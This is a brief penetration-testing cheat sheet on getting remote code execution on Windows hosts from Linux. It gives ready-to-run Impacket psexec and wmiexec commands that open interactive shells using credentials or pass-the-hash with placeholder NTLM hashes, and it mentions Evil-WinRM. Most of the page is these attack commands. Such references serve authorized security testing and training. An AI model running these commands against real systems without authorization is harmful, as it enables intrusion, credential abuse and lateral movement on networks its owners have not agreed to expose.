Windows Remote Code Execution from Linux
Last modified: 2023-02-08
RCE
Windows
If we have credentials for target Windows system, we can execute commands from Linux machine.
Getting into an Interactive Shell
Impacket PsExec
PsExec gives us an interactive shell on the Windows host.
impacket-psexec username:password@<target-ip>
# Pass the Hashes
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1
Impacket WmiExec
WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hashes
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
Evil-WinRM
Also we can use Evil-WinRM if the target Windows host uses/opens the WinRM (Windows Remote Management).